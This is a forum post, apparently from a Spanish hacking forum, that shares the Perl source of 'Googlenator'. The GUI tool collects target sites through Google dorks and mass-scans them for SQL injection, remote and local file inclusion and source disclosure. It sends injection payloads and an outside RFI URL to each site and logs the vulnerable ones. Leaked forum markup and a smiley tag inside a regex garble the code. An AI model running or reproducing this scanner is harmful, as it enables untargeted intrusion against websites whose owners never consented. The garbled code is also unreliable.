[Perl] G00gl3nator By Doddy H

Bueno ,este es un scanner en su version grafica ,este programa puede scanear

• SQLI[/li]
  
• RFI [/li]
  
• LFI[/li]
  
• Full Source Discloure[/li][/list]
  
  Tambien pueden buscar en google string en google con , los resultados
  son guardados en una carpeta que el programa instalar al ejecutarse
  
  
  Código: Perl
  1. #!usr/bin/perl
  2. #Googlenator (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use Tk::FileSelect;
  7. use URI::Split qw(uri_split);
  8. use Cwd;
  9. use WWW::Mechanize;
  10.  
  11. if ($^O eq 'MSWin32') {
  12. use Win32::Console;
  13. Win32::Console::Free();
  14. }
  15.  
  16. my $nave = WWW::Mechanize->new(autocheck => 0);
  17. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
  18.  
  19. installer();
  20.  
  21. my $new = MainWindow->new(-background=>"black");
  22.  
  23. $new->title("Googlenator (C) Doddy Hackman 2011");
  24. $new->geometry("780x530");
  25. $new->resizable(0,0);
  26.  
  27. $d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
  28. my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
  29. my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
  30. $d->pack(-side=>"top",-fill=>"x");
  31.  
  32. $scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
  33. $scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
  34. $scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
  35. $scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);
  36.  
  37. $logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
  38. $logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
  39. $logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
  40. $logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
  41. $logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);
  42.  
  43. my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
  44. head();
  45.  
  46. $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");
  47.  
  48. my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");
  49.  
  50. $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");
  51.  
  52. my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");
  53.  
  54. $new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");
  55.  
  56. my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");
  57.  
  58. $new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
  59. $new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
  60. $new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");
  61.    
  62. MainLoop;
  63.  
  64. head();
  65.  
  66. sub googler {
  67.  
  68. my $google = $google->get;
  69. my $pages = $pages->get;
  70. my $dorks = $dorks->get;
  71.  
  72. head();
  73.  
  74. $box->insert("end","\t\t</li><li type="square"> Searching pages with string $dorks\n\n");[/li][/list]
  75.  
  76. my @webas = google($google,$dorks,$pages);
  77.  
  78. $box->insert("end","\t\t</li><li type="square"> Cleaning\n\n");[/li][/list]
  79. $box->insert("end","\t\t</li><li type="square"> Webs Found ".int(@webas)."\n\n");[/li][/list]
  80.  
  81. for(@webas) {
  82. $new->update();
  83. $box->insert("end","\t\t[Link] : ".$_."\n");
  84. savefile($dorks.".txt",$_);
  85. }
  86.  
  87. $box->insert("end","\n\t\t</li><li type="square"> All save in logs/search/".$dorks."\n");[/li][/list]
  88. $box->insert("end","\t\t</li><li type="square"> Finished\n\n");[/li][/list]
  89.    
  90. }
  91.  
  92. sub loadsql {
  93.  
  94. $browse = $new->FileSelect(-directory => "/");
  95. my $filea = $browse->Show;
  96.  
  97. head();
  98. $box->insert("end","\t\t</li><li type="square"> File : $filea\n");[/li][/list]
  99.  
  100. open (FILE,$filea);
  101. @words = <FILE>;
  102. close FILE;
  103.  
  104. chomp @words;
  105.  
  106. $box->insert("end","\t\t</li><li type="square"> Webs Found : ".int(@words)."\n\n");[/li][/list]
  107.  
  108. for my $page(@words) {
  109. my $page = clean($page);
  110. $new->update();
  111. scansql($page);
  112. }
  113.  
  114. sub scansql {
  115. my ($pass1,$pass2) = ("+","--");
  116. my $page = shift;
  117. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  118. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  119. $box->insert("end","\t\t</li><li type="square"> SQLI : $page\n");[/li][/list]
  120. savefilevul("sql-logs.txt",$page);
  121. }}}
  122.  
  123. sub loadrfi {
  124.  
  125. $browse = $new->FileSelect(-directory => "/");
  126. my $filea = $browse->Show;
  127.  
  128. head();
  129. $box->insert("end","\t\t</li><li type="square"> File : $filea\n");[/li][/list]
  130.  
  131. open (FILE,$filea);
  132. @words = <FILE>;
  133. close FILE;
  134.  
  135. chomp @words;
  136.  
  137. $box->insert("end","\t\t</li><li type="square"> Webs Found : ".int(@words)."\n\n");[/li][/list]
  138.  
  139. for my $page(@words) {
  140. my $page = clean($page);
  141. $new->update();
  142. scanrfi($page);
  143. }
  144.  
  145. sub scanrfi {
  146. my $page = shift;
  147. $code1 = toma($page."http:/www.supertangas.com/");
  148. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
  149. $box->insert("end","\t\t</li><li type="square"> RFI : $page\n");[/li][/list]
  150. savefilevul("rfi-logs.txt",$page);
  151. }}}
  152.  
  153. sub loadlfi {
  154.  
  155. $browse = $new->FileSelect(-directory => "/");
  156. my $filea = $browse->Show;
  157.  
  158. head();
  159. $box->insert("end","\t\t</li><li type="square"> File : $filea\n");[/li][/list]
  160.  
  161. open (FILE,$filea);
  162. @words = <FILE>;
  163. close FILE;
  164.  
  165. chomp @words;
  166.  
  167. $box->insert("end","\t\t</li><li type="square"> Webs Found : ".int(@words)."\n\n");[/li][/list]
  168.  
  169. for my $page(@words) {
  170. my $page = clean($page);
  171. $new->update();
  172. scanlfi($page);
  173. }
  174.  
  175.  
  176. sub scanlfi {
  177. my $page = shift;
  178. $code1 = toma($page."'");
  179. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  180. $box->insert("end","\t\t</li><li type="square"> LFI : $page\n");[/li][/list]
  181. savefilevul("lfi-logs.txt",$page);
  182. }}}
  183.  
  184. sub loadfsd {
  185.  
  186. $browse = $new->FileSelect(-directory => "/");
  187. my $filea = $browse->Show;
  188.  
  189. head();
  190. $box->insert("end","\t\t</li><li type="square"> File : $filea\n");[/li][/list]
  191.  
  192. open (FILE,$filea);
  193. @words = <FILE>;
  194. close FILE;
  195.  
  196. chomp @words;
  197.  
  198. $box->insert("end","\t\t</li><li type="square"> Webs Found : ".int(@words)."\n\n");[/li][/list]
  199.  
  200. for my $page(@words) {
  201. my $page = clean($page);
  202. $new->update();
  203. scanfsd($page);
  204. }
  205.  
  206. sub scanfsd {
  207. my $page = shift;
  208. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  209. if ($path=~/\/(.*)$/) {
  210. my $me = $1;
  211. $code1 = toma($page.$me);
  212. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  213. $box->insert("end","\t\t</li><li type="square"> Full Source Discloure : $page\n");[/li][/list]
  214. savefilevul("fsd-logs.txt",$page);
  215. }}}}
  216.  
  217. sub head {
  218.  
  219. $box->delete("0.0","end");
  220.  
  221. $box->insert("end","
  222.           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@  
  223.          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@
  224.         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@
  225.         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@  
  226.         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@  
  227.          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@
  228.           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@
  229.  
  230.  
  231.  
  232.  
  233. ");
  234. }
  235.  
  236. sub about {
  237. $about = MainWindow->new(-background=>"black");
  238. $about->title("Googlenator v0.3");
  239. $about->geometry("300x110");
  240. $about->resizable(0,0);
  241. $about->Label(-background=>"black",-foreground=>"cyan")->pack();
  242. $about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
  243. $about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
  244. $about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
  245. }
  246.  
  247. sub exitx {
  248. exit(1);
  249. }
  250.  
  251. sub savefilevul {
  252. open (SAVE,">>logs/vulz/".$_[0]);
  253. print SAVE $_[1]."\n";
  254. close SAVE;
  255. }
  256.  
  257. sub toma {
  258. return $nave->get($_[0])->content;
  259. }
  260.  
  261. sub dame_link {
  262. return $nave->find_all_links();
  263. }
  264.  
  265. sub clean {
  266. if ($_[0] =~/\=/) {
  267. my @sacar= split("=",$_[0]);
  268. return(@sacar[0]."=");
  269. }
  270. }
  271.  
  272. sub savefile {
  273. open (SAVE,">>logs/search/".$_[0]);
  274. print SAVE $_[1]."\n";
  275. close SAVE;
  276. }
  277.  
  278. sub google {
  279.  
  280. for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
  281. $new->update();
  282. toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
  283. @links = dame_link();
  284. for my $l(@links) {
  285. if ($l->url() =~/webcache.googleusercontent.com/) {
  286. push(@url,$l->url());
  287. }
  288. }
  289. }
  290.  
  291. for(@url) {
  292. if ($_ =~/cache:(.*?)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*?)\+/) {
  293. push(@founds,$2);
  294. }
  295. }
  296.  
  297. my @founds = repes(@founds);
  298.  
  299. return @founds;
  300. }
  301.  
  302.  
  303. sub installer {
  304.  
  305. unless (-d "logs/") {
  306. mkdir("logs/","777");
  307. mkdir("logs/search","777");
  308. mkdir("logs/vulz","777");
  309. }
  310. }
  311.  
  312. sub repes {
  313. foreach my $palabra ( @_ ) {
  314. next if $repety{ $palabra }++;
  315. push @revisado,$palabra;
  316. }
  317. return @revisado;
  318. }
  319.  
  320. sub loadgoogle {
  321. system("start ".getcwd()."/logs/search/");
  322. }
  323.  
  324. sub loadfilesql {
  325. system("start logs/vulz/sql-logs.txt");
  326. }
  327.  
  328.  
  329. sub loadfilelfi {
  330. system("start logs/vulz/lfi-logs.txt");
  331. }
  332.  
  333.  
  334. sub loadfilerfi {
  335. system("start logs/vulz/rfi-logs.txt");
  336. }
  337.  
  338.  
  339. sub loadfilefsd {
  340. system("start logs/vulz/fsd-logs.txt");
  341. }
  342.  
  343. # ¿ The End ?
  344.